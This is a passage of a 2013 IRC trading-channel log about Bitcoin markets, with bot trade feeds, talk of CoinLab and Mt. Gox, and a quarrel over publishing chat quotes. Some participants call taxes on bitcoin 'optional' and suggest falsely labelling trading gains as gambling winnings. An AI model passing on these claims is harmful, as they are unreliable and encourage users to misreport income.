16.98 BTC [+] Mar 16 10:34:00 volume Mar 16 10:34:17 ok, thx Mar 16 10:34:35 Bowjob: that's a very distracting nickname Mar 16 10:34:39 [BTCTC] [ASICMINER-PT] 5 @ 0.849 = 4.245 BTC [+] Mar 16 10:35:25 you are not the first. Mar 16 10:36:10 So anyone has an idea why the majority of traders thinks btc will go down to 39? Mar 16 10:36:24 rikur_ http://polimedia.us/dtng/c/res/14686.html there, allow me to be helpful Mar 16 10:36:28 march 12 fuckup? Mar 16 10:36:55 Guest7560 just the revert to mean theory may be enough. it went up fast. Mar 16 10:37:09 though I'm waiting for march 22 and the days after that.. Mar 16 10:37:24 What's happening on the 22? Mar 16 10:37:37 coinlab opens Mar 16 10:37:39 mircea_popescu: thanks! Mar 16 10:37:54 america and canada wont be able to trade on mt gox anymore Mar 16 10:37:58 Bowjob: I think the fork thing is over now and everybody relaxed, no? Mar 16 10:38:19 yes, but it scared a bunch of people.. Mar 16 10:38:55 I know, but that's over now, so I wouldn't expect a drop so many days after its over and fixed Mar 16 10:39:30 Tell me about that coinlab/mtgox US/CA story Mar 16 10:40:13 it's not really fixed. just strung together for now. Mar 16 10:40:18 the fixing will take a lot of time. Mar 16 10:40:19 basically wall st. , im speculating will play with bitcoins Mar 16 10:41:09 http://coinlab.com/transition Mar 16 10:41:33 Taxes won't be optional anymore if you trade with coinlab Mar 16 10:41:38 mircea_popescu: You mean until nobody uses the 0.8 version anymore that has the bug that caused the block to be rejected? Mar 16 10:42:00 Guest7560 it's .7 and prev that have an issue. not exactly a bug. just a complex db issue. Mar 16 10:42:26 Bowjob: taxes? Mar 16 10:42:35 Yeap Mar 16 10:42:37 Alright, sorry for mixing this up Mar 16 10:43:00 Up until now, if you have half a braincell, you can choose to pay taxes or not Mar 16 10:43:08 uncle sam wont know Mar 16 10:43:19 but CoinLab will report it to the irs Mar 16 10:43:28 nice. Mar 16 10:43:30 if you make 500 dollars or more Mar 16 10:43:40 basically, they are "legitimizing" bitcoin Mar 16 10:44:03 have you seen their buy 1m and sell 1m worth of bitcoin button? Mar 16 10:44:20 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Mar 16 10:44:32 bowjob: taxes were never optional even at mtgox Mar 16 10:45:03 oh. but they dont hand in the info to irs dont they Mar 16 10:45:19 bowjob: they may not but when you withdraw funds the recieving bank does Mar 16 10:45:24 Wait. If I have BTC in mt.gox, will it be sold to coinlab? or moved under their jurisdiction? I'm currently in Canada. Mar 16 10:45:36 coinlab Mar 16 10:45:44 mhm, actually you're right Mar 16 10:45:45 mhm Mar 16 10:46:17 the benefit to canada is you could say your proceeds came from online gambling Mar 16 10:46:26 as a casual gambler Mar 16 10:46:48 thats not taxable in canada Mar 16 10:47:09 coinlab has a very unfortunate logo with the "bubbles" :) Mar 16 10:47:10 Coinlab statement is still pretty vague... Mar 16 10:47:34 what i dont like about coinlab Mar 16 10:47:51 is they are offering a "storage" solution Mar 16 10:48:00 and they will charge money to hold BTC Mar 16 10:48:04 .. i mean, wtf? Mar 16 10:48:06 how is that any different then mtgox Mar 16 10:48:12 mtgox stored your coins Mar 16 10:48:16 https://bitcointalk.org/index.php?topic=153556.msg1630348#msg1630348 lol Mar 16 10:48:24 you're missing the point Mar 16 10:48:32 http://coinlab.com/storage Mar 16 10:48:35 How would you be taxed for mined coins? Mar 16 10:49:19 you wouldnt rikur Mar 16 10:49:22 cashout price - electricity - mining rig price Mar 16 10:49:26 = income Mar 16 10:49:31 and then they tax your income Mar 16 10:49:34 until you started filling up a bank account Mar 16 10:49:36 you dont have to if you just keep the coins Mar 16 10:49:49 thats the thing. if you use the coins anonymously, its just like income Mar 16 10:49:53 and taxes, will be optional Mar 16 10:50:42 it could get sticky when the gov recognize bitcoin as money Mar 16 10:51:43 what you can do, is wait till your bitcoin stash become so valuable, that you can buy a member of the congress with it Mar 16 10:52:53 [BTCTC] [ASICMINER-PT] 1 @ 0.849 BTC [+] Mar 16 10:53:08 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 16 10:53:13 ahahaha THIS is even money ? Mar 16 10:53:15 lord have mercy. Mar 16 10:53:48 I thought I brought it up earlier lol Mar 16 10:54:02 had i ? Mar 16 10:54:08 must've forgot Mar 16 10:54:38 yes you did Mar 16 10:54:39 "[16:04] http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ [16:04] Wow [16:04] HOly shit. ahhahahahah [16:04] lol wut ?! [16:04] don't tell me they;ve moved to july ?" Mar 16 10:54:57 a yes you have! Mar 16 10:55:11 chang put a quarter in on yes Mar 16 10:55:27 a quarter btc = 10 bux Mar 16 10:57:49 so wait. luke went to visit bfl, where he was in fact presented with a box of fans ? Mar 16 10:58:09 yeap Mar 16 10:58:28 sdice has almost no bids? Mar 16 10:58:28 https://forums.butterflylabs.com/blogs/luke-jr/100-day-2-slight-delay.html Mar 16 10:58:34 "slight delay" Mar 16 10:58:40 heh. Mar 16 10:58:54 it scares me though, if they actually deliver there goes my profits Mar 16 10:58:57 i guess he better start looking for crow stew recipes. Mar 16 10:58:59 [MPEX] [S.MPOE] 1354 @ 0.00071102 = 0.9627 BTC [-] Mar 16 10:59:03 though.. Mar 16 10:59:14 they might not ship Mar 16 10:59:30 Bitbet suggests that BFL victims are low on morale Mar 16 10:59:58 mircea: are the bbet asks your tranches Mar 16 11:00:03 they should be betting on Yes to make up on their lost profits Mar 16 11:03:26 tiberiusiv the 10k bits are mine/kako's alternatively, as per the contract Mar 16 11:04:34 18s yours as well? Mar 16 11:04:38 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.21053791 = 210.5379 BTC [+] Mar 16 11:04:52 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17621836 = 176.2184 BTC [+] Mar 16 11:04:53 0.00181000 300 Mar 16 11:04:57 tiberiusiv 18s ? a, no Mar 16 11:05:11 you can work it out, they're supposed to increase in price at a fixed rate Mar 16 11:05:16 see if the price works out with that Mar 16 11:05:41 hows this month looking for profits? Mar 16 11:06:18 as per the guidance in feb statement, "Since the BFL bet closed in March the dividend guidance is high for next month - just that bet alone would push profit up 300%." Mar 16 11:07:44 [BTCTC] [S.DICE-PT] 20 @ 0.0053 = 0.106 BTC [+] Mar 16 11:08:34 [BTCTC] [S.DICE-PT] 13 @ 0.00535 = 0.0696 BTC [+] Mar 16 11:11:40 is sdice working? Mar 16 11:12:18 the bet page isnt showing up Mar 16 11:12:52 [MPEX] [S.MPOE] 21400 @ 0.0007078 = 15.1469 BTC [-] Mar 16 11:12:57 [MPEX] [S.MPOE] 11700 @ 0.00070473 = 8.2453 BTC [-] Mar 16 11:13:35 maybe attacked again ? Mar 16 11:13:35 [BTCTC] [S.DICE-PT] 83 @ 0.0054 = 0.4482 BTC [+] Mar 16 11:13:58 [BTCTC] [ASICMINER-PT] 1 @ 0.849 BTC [+] Mar 16 11:15:39 works for me Mar 16 11:16:14 actually Mar 16 11:16:16 looks like teh db Mar 16 11:16:18 is coming and going Mar 16 11:16:26 Wow, does bitcoin already have 3x the market cap of e-gold at it's peak? Mar 16 11:16:32 rikur_ yes. Mar 16 11:16:49 never thought of that. Mar 16 11:18:50 https://bitcointalk.org/index.php?topic=131065.880 Mar 16 11:18:55 implied btc market cap is larger than the gnp of Dominica ; Tonga ; Micronesia, Federated States of ; Anguilla ; Cook Islands ; São Tomé and Príncipe ; Palau ; Marshall Islands ; Kiribati ; Nauru ; Montserrat ; Tuvalu Mar 16 11:18:59 I have a feeling this dude will be correct for once Mar 16 11:18:59 that's like12. Mar 16 11:19:09 [BTCTC] [ASICMINER-PT] 8 @ 0.849 = 6.792 BTC [+] Mar 16 11:20:57 so.. Mar 16 11:21:00 hanging man Mar 16 11:21:24 doesnt it mean extremely bullish? Mar 16 11:21:34 if i remember correct... Mar 16 11:21:39 hanging man is the end of uptrend Mar 16 11:21:43 ahh Mar 16 11:21:47 if you believe in technical analysis.. Mar 16 11:21:50 well Mar 16 11:23:22 well, lucif has been consistently wrong in the past.. Mar 16 11:23:29 mhm Mar 16 11:25:16 "tting ready to change. The reliability of this signal is drastically improved when the price of the asset decreases the day after the signal. Read more: http://www.investopedia.com/terms/h/hangingman.asp#ixzz2Nh2Xhc2X" Mar 16 11:25:32 well we were at 47 yesterday Mar 16 11:25:34 ;;ticker Mar 16 11:25:35 BTCUSD ticker | Best bid: 46.65099, Best ask: 46.65100, Bid-ask spread: 0.00001, Last trade: 46.65100, 24 hour volume: 19628.80463838, 24 hour low: 46.27070, 24 hour high: 47.44999, 24 hour vwap: 46.89741 Mar 16 11:25:44 perhaps it is a hanging man! Mar 16 11:26:26 .. how droll. You quoted me. Got to you, did I? Mar 16 11:26:38 "quoted" Mar 16 11:31:22 mircea_popescu: http://freenode.net/channel_guidelines.shtml Mar 16 11:33:28 mircea_popescu: Not that you care about much outside your own head, but I did not, nor would I, grant you permission to publically public anything I say in a channel which is not clearly demarked as a "Publically-logged channel." Mar 16 11:33:42 s/public /publish / Mar 16 11:35:24 I will note that neither the channel topic, nor the page that the topic's sole contents (a URL) point to, state anything about public logging. Mar 16 11:35:47 [BTCTC] [ASICMINER-PT] 20 @ 0.849 = 16.98 BTC [+] Mar 16 11:36:23 [BTCTC] [ASICMINER-PT] 1 @ 0.849 BTC [+] Mar 16 11:38:11 dice is down from here Mar 16 11:45:39 dice is up here....took about 2 minutes to get bet addresses up Mar 16 11:52:36 [MPEX] [S.MPOE] 11380 @ 0.00070489 = 8.0216 BTC [+] Mar 16 11:52:38 [MPEX] [S.MPOE] 9270 @ 0.00071093 = 6.5903 BTC [+] Mar 16 11:56:36 midnightmagic this is a logged channel. you weren't aware ? Mar 16 11:57:55 [MPEX] [S.MPOE] 6811 @ 0.00070473 = 4.7999 BTC [-] Mar 16 11:57:57 [MPEX] [S.MPOE] 3900 @ 0.00070369 = 2.7444 BTC [-] Mar 16 11:57:58 [MPEX] [S.MPOE] 9029 @ 0.00070102 = 6.3295 BTC [-] Mar 16 11:58:03 It is not stated so in the topic, nor in the bitcoin-assets.com page it links to, mircea_popescu. Mar 16 11:58:15 yeah well. it's a trade chan. Mar 16 11:58:21 it's purpose is mostly to be quotable. Mar 16 11:58:52 That is not by Freenode guidelines. Mar 16 11:59:49 ya well. now you know. Mar 16 12:00:40 You are not the channel owner. Mar 16 12:00:50 And thus are not in a position to make such determinations regardless. Mar 16 12:00:55 ... Mar 16 12:01:07 make a determination as to what dood ? Mar 16 12:01:21 Channel nature and type. Mar 16 12:01:40 you highlighted me with whatever q, i gave you an answer, you don't like mine highlight whoever else next time eh ?! Mar 16 12:01:48 This is a primary namespace channel and thus technically falls under the Bitcoin FOSS project ownership. Mar 16 12:01:57 o get the fuck out already. Mar 16 12:02:24 I'm making a comment shortly on your blog you may be interested in. Mar 16 12:02:25 "i have a whine please pay attention to me rarara" Mar 16 12:02:28 it's uninteresting. Mar 16 12:02:43 by all means. Mar 16 12:02:46 Are you still in Romania? Mar 16 12:02:50 yeh. Mar 16 12:03:00 Good. Then I remember correctly. Mar 16 12:04:23 but anyway, to the more general point : you're powerless. get used to liking it, cause it ain't changing. Mar 16 12:04:40 the impersonal you i mean. the little vessenes group, bfl, mtgox, what have you in there. Mar 16 12:05:26 You are quoting me out of context and thus impugning my moral rights under the copyright acts of both our countries. Mar 16 12:05:47 so feel free to either sue or fix the context. Mar 16 12:06:13 No, as per Romanian copyright law I am requesting you remove quotes of mine from your website. Mar 16 12:06:25 mkay. Mar 16 12:07:56 Your site isn't letting me post. How do I convince it I'm a human? I'll flesh out the articles specifically to which I'm referring. Mar 16 12:08:20 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [+] Mar 16 12:08:21 midnightmagic if you instapost it'll block you. Mar 16 12:08:34 cause that's what spambots usually do, load page make post Mar 16 12:08:50 Hrm. I took about 30 minutes to write my comment..? Mar 16 12:08:56 Maybe it doesn't like Tor. Mar 16 12:09:39 ppl on tor post all the time Mar 16 12:10:10 Hrm. 3:09 a.m... no, that's correct too. Mar 16 12:10:14 it's possible if unlikely your page was marked as stale by the time you clicked ? Mar 16 12:10:30 Possible. I'll try again. Mar 16 12:18:32 geez i am almost gonna give MP some money just so I can see this quote Mar 16 12:20:02 ZedsterX try tor. Mar 16 12:20:41 for what? Mar 16 12:20:58 [MPEX] [S.BBET] 300 @ 0.00181 = 0.543 BTC [+] Mar 16 12:21:01 i meant i was almost willing to pay your blog price Mar 16 12:21:03 mircea_popescu: Yep, it didn't like Tor. Mar 16 12:21:26 ZedsterX: It's nothing special at all. It's what he said about it. Mar 16 12:22:00 hehe just kidding i would never pay to read someones blog not an issue :) Mar 16 12:22:22 I thought it was a joke at first but it appears he has also mistaken me for a DJ in Wisconsin. Mar 16 12:22:30 ZedsterX: :) Mar 16 12:28:14 [BTCTC] [ASICMINER-PT] 3 @ 0.849 = 2.547 BTC [+] Mar 16 12:28:16 [BTCTC] [ASICMINER-PT] 10 @ 0.849999 = 8.5 BTC [+] Mar 16 12:29:12 [BTCTC] [ASICMINER-PT] 9 @ 0.85 = 7.65 BTC [+] Mar 16 12:33:54 mircea_popescu: What's the big deal man? I asked you nicely, you said no, I quote you the law of your own country you are breaking by deliberately quoting me out of context and making unfunny, uncritical, non-commentary aspersions on my character, and this is your response? srsly? Mar 16 12:34:16 It's like.. six lines bro. Mar 16 12:34:30 you're obviously missing the context that Trilema has been standing against attempts at internet censorship for half a decade. Mar 16 12:34:36 the odds of an article being altered are nil. Mar 16 12:35:00 You have always been a proponent of legal correctness. Mar 16 12:35:18 you honestly imagine you can absue the legal process to impose censorship on blogs ? Mar 16 12:35:31 others have tried, and have failed so far, but by all means, if you must. Mar 16 12:36:07 lol, no, I'm pointing out a legal liability, and requesting that you not quote me, in direct contravention of the policy of the network you enjoy and make money with, for free. Mar 16 12:36:19 (namely, Freenode) Mar 16 12:36:41 last i checked you have a free cloak and i have a silver one. let's keep them aspersions at bay. Mar 16 12:36:55 You can bury your head in the sand and pretend the law doesn't apply to you and pretend what I'm doing is censorship, and pretend there is no other way, but there is. Mar 16 12:37:28 indeed there is. get used to the fact that this channel is a public forum, serving the needs of bitcoin trade Mar 16 12:38:04 This isn't a public forum, it is not listed as such. You saying it is so, does not make it so. This is primary namespace #bitcoin*, which means it certainly isn't for you to decide what happens here, nor what policy is. Mar 16 12:38:11 the needs of the bitcoin circlejerk are served elsewhere. Mar 16 12:38:36 This particular channel is not, actually a public forum, no matter how many times you think your word is somehow above law. Mar 16 12:38:42 listen, i'm not arguing with you. i'm telling you. you don't like what i'm telling you, go argue with somebody else. Mar 16 12:38:49 lol Mar 16 12:38:55 Lawless.. Mar 16 12:39:03 Discourteous, uncivil, lawless. Mar 16 12:39:08 merely disinterested in nonsense. Mar 16 12:39:11 Is this your true nature after all? Mar 16 12:40:07 Are you so mercenary? So sociopathic that you would deny a simple request for the same courtesy I have often showed you without considering the alternatives? Mar 16 12:40:47 Do you have any idea how many times I've turned down requests for complete logs of your conversations? Mar 16 12:42:29 [MPEX] [S.MPOE] 971 @ 0.00070102 = 0.6807 BTC [-] Mar 16 12:42:30 [MPEX] [S.MPOE] 14734 @ 0.00069148 = 10.1883 BTC [-] Mar 16 12:42:32 [MPEX] [S.MPOE] 10000 @ 0.00069002 = 6.9002 BTC [-] Mar 16 12:42:53 If you're cool with throwing all the courtesy we've shown each other over the last many months away just because of a few-day spat that stings your ego.. Mar 16 12:43:49 midnightmagic: why not put it in context in the comment section? i don't think it gets censored either Mar 16 12:44:16 FabianB: Because that would imply I am fine with it staying up; additionally, if *I* publish it on *his* site then I lose the right to request that it come down. Mar 16 12:44:31 Or at least.. my request is weakened. Mar 16 12:44:42 you have some very interesting legal theories going there. Mar 16 12:45:01 but anyway, since it's on the third mention by now, when did i ask you to delete shit you published ? or what ? Mar 16 12:45:16 mircea_popescu: It's not legal theory, it's simple human nature at this point. I'm not interested in answering the question, "Why if you wanted it taken down did you repost it right underneath?" Mar 16 12:45:38 this "taking down" thing boggles me. Mar 16 12:45:49 where's this come from !? Mar 16 12:46:01 mircea_popescu: You didn't. I don't publish shit. People ask me for logs of your comments and I think.. "Well people are trying to dig up shit. Probably because they want to harm him. No thanks." And I tell them to fuck off. Mar 16 12:46:16 very bad. Mar 16 12:46:29 let them have whatever logs, what i say i say because it is, not because it isn't. Mar 16 12:47:25 mircea_popescu: No thanks. Mar 16 12:47:28 da fuck, they can just grow a pair and ask me directly. Mar 16 12:47:43 mircea_popescu: That's the second reason why I tell them to fuck off. Mar 16 12:47:50 hmmm Mar 16 12:47:54 do you get free yubikey from mtgox? Mar 16 12:48:09 all this mystique and mystery, i hadn't no idea people are like... secretively lurking my chats nao. Mar 16 12:48:12 Anduck: sometimes, and volume helps. Mar 16 12:48:14 i heard something like this but... do i need to be verified? Mar 16 12:48:20 ok Mar 16 12:48:29 Anduck isn't a yubikei like 10 bux, and moreover don't they work on any site ? Mar 16 12:48:45 mtgox keys work only on mtgox Mar 16 12:48:45 no, and no Mar 16 12:48:57 Mt.gox yubikey only works for them Mar 16 12:48:57 mtgox charges 30 usd for yubikey Mar 16 12:49:13 meh Mar 16 12:49:18 i'll email dem Mar 16 12:49:37 or! i get verifired Mar 16 12:49:39 verified* Mar 16 12:50:10 but i dont want to :( atleast now Mar 16 12:50:18 maybe i'll use software 2fa Mar 16 12:52:07 software 2fa ?! Mar 16 12:52:40 [MPEX] [S.MPOE] 4095 @ 0.00068804 = 2.8175 BTC [-] Mar 16 12:53:42 Google Authenticator Mar 16 12:53:47 like, a mobile phone app Mar 16 12:54:06 2fa= 2-factor auth Mar 16 12:54:14 a ga thing ya Mar 16 12:59:59 [MPEX] [S.MPOE] 5800 @ 0.00070617 = 4.0958 BTC [+] Mar 16 13:04:40 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 16 13:04:41 [BTCTC] [BTC-BOND] 4 @ 0.009861 = 0.0394 BTC [-] Mar 16 13:04:43 [BTCTC] [BTC-BOND] 4 @ 0.00986 = 0.0394 BTC [-] Mar 16 13:04:45 [BTCTC] [BTC-BOND] 20 @ 0.00982 = 0.1964 BTC [-] Mar 16 13:06:00 [BTCTC] [BASIC-MINING] 3 @ 0.33318 = 0.9995 BTC [-] Mar 16 13:06:50 [BTCTC] [PAJKA.BOND] 50 @ 0.105 = 5.25 BTC [+] Mar 16 13:07:51 http://sphotos-g.ak.fbcdn.net/hphotos-ak-prn1/72607_10152634902385487_365736104_n.jpg Mar 16 13:08:02 once a banker... ever a banker. Mar 16 13:09:13 [MPEX] [S.MPOE] 8300 @ 0.00071093 = 5.9007 BTC [+] Mar 16 13:24:06 [MPEX] [S.MPOE] 12800 @ 0.0007106 = 9.0957 BTC [-] Mar 16 13:31:04 [BTCTC] [ASICMINER-PT] 9 @ 0.85 = 7.65 BTC [+] Mar 16 13:32:43 http://coinlab.com/ Mar 16 13:32:54 I been watching lately, they sell a lot Mar 16 13:33:06 more sell than buys Mar 16 13:33:07 mhm Mar 16 13:33:50 [BTCTC] [PAJKA.BOND] 13 @ 0.105 = 1.365 BTC [+] Mar 16 13:36:45 [MPEX] [O.BTCUSD.C470T] 1000 @ 0.15445864 = 154.4586 BTC [-] Mar 16 13:36:46 [MPEX] [O.BTCUSD.C490T] 1000 @ 0.13342614 = 133.4261 BTC [-] Mar 16 13:36:49 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.11500402 = 115.004 BTC [+] Mar 16 13:36:51 [MPEX] [O.BTCUSD.C530T] 1000 @ 0.09894671 = 98.9467 BTC Mar 16 13:36:54 [MPEX] [O.BTCUSD.C550T] 1000 @ 0.08501814 = 85.0181 BTC Mar 16 13:57:07 ;;ticker Mar 16 13:57:08 BTCUSD ticker | Best bid: 46.52002, Best ask: 46.77899, Bid-ask spread: 0.25897, Last trade: 46.52002, 24 hour volume: 18864.05282020, 24 hour low: 46.27070, 24 hour high: 47.44999, 24 hour vwap: 46.87026 Mar 16 14:00:06 [MPEX] [S.MPOE] 8050 @ 0.0007106 = 5.7203 BTC [-] Mar 16 14:11:49 [MPEX] [S.MPOE] 5400 @ 0.0007106 = 3.8372 BTC [-] Mar 16 14:26:21 [BTCTC] [ASICMINER-PT] 32 @ 0.85 = 27.2 BTC [+] Mar 16 14:27:04 [MPEX] [S.MPOE] 955 @ 0.00070617 = 0.6744 BTC [-] Mar 16 14:27:06 [MPEX] [S.MPOE] 23500 @ 0.00070309 = 16.5226 BTC [-] Mar 16 14:31:25 [MPEX] [S.MPOE] 11595 @ 0.000703 = 8.1513 BTC [-] Mar 16 14:31:27 [MPEX] [S.MPOE] 2000 @ 0.00070794 = 1.4159 BTC [+] Mar 16 14:31:28 [MPEX] [S.MPOE] 3296 @ 0.00071093 = 2.3432 BTC [+] Mar 16 14:36:09 http://www.nytimes.com/2013/03/16/business/global/showdown-looms-over-cyprus-bailout-deal.html Mar 16 14:36:21 so basically, the naive got their bank accounts raided. Mar 16 14:43:21 [MPEX] [S.MPOE] 6650 @ 0.00070556 = 4.692 BTC [-] Mar 16 14:43:23 [MPEX] [S.MPOE] 19350 @ 0.00069804 = 13.5071 BTC [-] Mar 16 14:43:31 also in the news, krugman badly owned by reality. http://www.cnbc.com/id/100558455 Mar 16 14:50:14 europe... Mar 16 14:50:46 im glad i moved to a place where the normal currency is gold and we export food. Mar 16 14:51:35 sounds sound strategically. Mar 16 14:52:33 try to buy a car here with a credit card and they will look at you like you are a retard.... try to pay in gold, no problem Mar 16 14:53:34 i do wish i held some land, but right now it is over priced here Mar 16 14:53:48 pretty cool. Mar 16 14:55:01 asean is going to be growing while the west is falling/failing Mar 16 14:55:55 asicminer is slowly moving up with decent volume despite paying weekly dividends Mar 16 14:56:32 also is s.dice down to limited? i used to see many more s.dice transactions and now only a few :/ Mar 16 14:57:12 block chain dot info used to show like 50% to 755 s dice transactions Mar 16 14:57:50 75% Mar 16 14:58:13 always was about half Mar 16 14:58:22 !ticker btct asicminer-pt Mar 16 14:58:24 [BTCT:ASICMINER-PT] 1D: 0.769999 / 0.8115 / 0.85 (466 shares, 378.2 BTC), 7D: 0.65 / 0.76347 / 0.973 (1434 shares, 1094.8 BTC), 30D: 0.65 / 0.72349 / 1 (2550 shares, 1844.9 BTC) Mar 16 14:58:57 the other exchange is getting a bit more volume but a bit lower price Mar 16 14:59:13 if you go look now it is about 1 transaction in like 20 Mar 16 14:59:21 for s dice, if that... it is odd Mar 16 14:59:36 hm Mar 16 14:59:52 i have noticed this over the last 10 hours or so Mar 16 15:00:02 could just be an off day Mar 16 15:00:04 i've never kept that close tabs Mar 16 15:00:36 i have not either, Mar 16 15:13:07 [MPEX] [S.MPOE] 2480 @ 0.00071093 = 1.7631 BTC [+] Mar 16 15:13:10 [MPEX] [S.MPOE] 4520 @ 0.00071108 = 3.2141 BTC [+] Mar 16 15:21:06 [HAVELOCK] [HIM] 1 @ 1.99 BTC [-] Mar 16 15:23:58 [MPEX] [S.MPOE] 9900 @ 0.00069831 = 6.9133 BTC [-] Mar 16 15:28:43 [MPEX] [S.MPOE] 15000 @ 0.00069831 = 10.4747 BTC [-] Mar 16 15:38:32 [MPEX] [O.BTCUSD.P730T] 15 @ 0.56117433 = 8.4176 BTC [-] Mar 16 15:45:05 [BTCTC] [ASICMINER-PT] 2 @ 0.889998 = 1.78 BTC [+] Mar 16 15:46:36 [BTCTC] [ASICMINER-PT] 10 @ 0.889999 = 8.9 BTC [+] Mar 16 15:46:38 [BTCTC] [ASICMINER-PT] 10 @ 0.939999 = 9.4 BTC [+] Mar 16 15:46:41 [BTCTC] [ASICMINER-PT] 10 @ 0.9487 = 9.487 BTC [+] Mar 16 15:46:43 [BTCTC] [ASICMINER-PT] 15 @ 0.9489 = 14.2335 BTC [+] Mar 16 15:47:15 [BTCTC] [ASICMINER-PT] 1 @ 0.9489 BTC [+] Mar 16 15:48:19 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [+] Mar 16 15:49:09 go asicminer Mar 16 15:49:53 [BTCTC] [ASICMINER-PT] 19 @ 0.9489 = 18.0291 BTC [+] Mar 16 15:50:16 [BTCTC] [COGNITIVE] 1 @ 0.17299 BTC [+] Mar 16 15:51:17 :D Mar 16 15:51:54 [BTCTC] [B.YABMC] 1 @ 0.01984 BTC [+] Mar 16 15:51:56 [BTCTC] [B.YABMC] 10 @ 0.01985 = 0.1985 BTC [+] Mar 16 15:54:02 https://twitter.com/JsSmRenton/status/312912911079194624/photo/1 Mar 16 15:54:10 http://yro.slashdot.org/story/13/03/15/2250235/brian-krebs-gets-swatted Mar 16 15:54:33 lol kakobrekla Mar 16 15:59:48 [BTCTC] [ASICMINER-PT] 4 @ 0.85 = 3.4 BTC [-] Mar 16 16:07:39 where can you a buy card with a cc? Mar 16 16:07:49 i would totally would for bonus points Mar 16 16:08:05 [MPEX] [S.MPOE] 23900 @ 0.00070255 = 16.7909 BTC [+] Mar 16 16:08:20 !ticker mpex s.dice Mar 16 16:08:22 [MPEX:S.DICE] 1D: 0.005 / 0.00518591 / 0.0058822 (36479 shares, 189.18 BTC), 7D: 0.005 / 0.00552063 / 0.006 (85443 shares, 471.70 BTC), 30D: 0.00300001 / 0.00612241 / 0.0069 (2393043 shares, 14,651.21 BTC) Mar 16 16:10:57 [BTCTC] [B.YABMC] 1 @ 0.01101 BTC [-] Mar 16 16:15:25 gawd, reading chatlog here is such a chore when people get dramatic Mar 16 16:16:41 asicminer at .95 now? Nice. Mar 16 16:16:55 :) Mar 16 16:17:05 back to .95, was at 1 Mar 16 16:17:13 lets see the faces when it all goes crashing down Mar 16 16:17:35 but we are going well over 1. we will control about 50% of the network for at least 3 months Mar 16 16:17:55 but bfl is releasing next week right? Mar 16 16:18:09 they hope to have their test unit done by then yeah Mar 16 16:18:25 who knows how many months to get their 5000 chips out Mar 16 16:18:33 but even then, only 25 th if lucky Mar 16 16:18:44 5000 was just the first batch Mar 16 16:18:49 theres 2 more players in the game Mar 16 16:19:15 yeah, maybe in 3 months someone else will be able to break asicminer from their 50% lock down... Mar 16 16:19:19 but that is a maybe Mar 16 16:20:16 BFL will probably will be releasing slowly. Mar 16 16:20:18 [BTCTC] [ASICMINER-PT] 1 @ 0.945 BTC [+] Mar 16 16:20:22 I ordered I think in Sep Mar 16 16:20:37 bfl (assuming their stuff works) will not ship all at once Mar 16 16:21:01 1 to 2 months for their 5000 chips, then they need to reload Mar 16 16:21:28 i'm pretty sure they claimed to be able to work much faster than that no? Mar 16 16:21:29 i dont think sept is in the first batch. Mar 16 16:21:36 not that their claims mean anything Mar 16 16:21:39 [BTCTC] [ASICMINER-PT] 4 @ 0.9489 = 3.7956 BTC [+] Mar 16 16:21:43 yeah 4 to 6 weeks from like 1 year ago ready to ship/.. Mar 16 16:24:05 why are people paying .95 when AM is on BF for .8? Mar 16 16:24:15 405 of the network for 3 months is .324 btc per share... Mar 16 16:24:21 40% Mar 16 16:24:35 that is a good question, and i dont know Mar 16 16:24:45 but im the seller at .95 and will buy at the other exchange... Mar 16 16:24:48 i heart arb Mar 16 16:24:52 my guess is more outreach is needed by BF Mar 16 16:25:26 iv not been around but i thought bf was the biggest exchange now Mar 16 16:26:12 probably Mar 16 16:26:47 but BTCT volume on AM alone might be challenging that Mar 16 16:27:10 :) Mar 16 16:27:45 my shares mosty, it has been pretty good Mar 16 16:28:00 mine were the first 1000 and about 70% of all the others Mar 16 16:28:22 been buying otc at like 30% less of what i have been moving them for on that exchange Mar 16 16:28:33 im really shocked it worked so well for so long Mar 16 16:28:57 [MPEX] [S.MPOE] 20000 @ 0.0007079 = 14.158 BTC [+] Mar 16 16:29:01 [MPEX] [S.MPOE] 7407 @ 0.00071108 = 5.267 BTC [+] Mar 16 16:32:51 [BTCTC] [ASICMINER-PT] 11 @ 0.9489 = 10.4379 BTC [+] Mar 16 16:32:56 180 gone on bitfunder Mar 16 16:33:14 hi all Mar 16 16:33:20 if it is still there in a few mins ill buy the rest Mar 16 16:33:24 hi mjr Mar 16 16:38:20 mircea_popescu: will do on the vwap cleanup Mar 16 16:38:27 what's asicminers returns like? Mar 16 16:38:41 !ticker Mar 16 16:38:42 Um, shouldn't you be with your own tribe or somethin'? Mar 16 16:39:33 mjr, these are the last 3 divs Mar 16 16:39:34 ฿0.02378654 ฿0.01917149 ฿0.02354460 Mar 16 16:39:53 once dive add up to .1, divs get cut in half Mar 16 16:40:03 dive=div Mar 16 16:40:39 divs are weekly Mar 16 16:41:06 why do they cut in half? Mar 16 16:41:53 because AM isnbt paying their own shares til then Mar 16 16:41:57 and they own half Mar 16 16:42:54 cool Mar 16 16:43:55 someone should tell evoorhees SDICE needs a jolt Mar 16 16:44:19 bring back whalebot Mar 16 16:44:49 just go play less than 1 Mar 16 16:49:14 ohh starcraft is out Mar 16 16:49:17 < Bowjob> you dont have to if you just keep the coins << (it being taxes) it you do that enough to be noticed and audited you're fucked. they'll say you should've been treating bitcoin as barter all along, you'll have a few k of taxes owed and 10s of k in fines Mar 16 16:49:21 [MPEX] [S.MPOE] 9675 @ 0.00071108 = 6.8797 BTC [+] Mar 16 16:59:07 [MPEX] [S.MPOE] 5098 @ 0.00071108 = 3.6251 BTC [+] Mar 16 16:59:09 [MPEX] [S.MPOE] 9502 @ 0.00071181 = 6.7636 BTC [+] Mar 16 17:00:08 [HAVELOCK] [HIM] 2 @ 1.99 = 3.98 BTC [-] Mar 16 17:05:59 [MPEX] [S.MPOE] 2038 @ 0.00070255 = 1.4318 BTC [-] Mar 16 17:06:00 [MPEX] [S.MPOE] 13783 @ 0.00070066 = 9.6572 BTC [-] Mar 16 17:06:05 [MPEX] [S.MPOE] 23279 @ 0.00070015 = 16.2988 BTC [-] Mar 16 17:07:28 [BTCTC] [CRYPTO-TRADE] 5 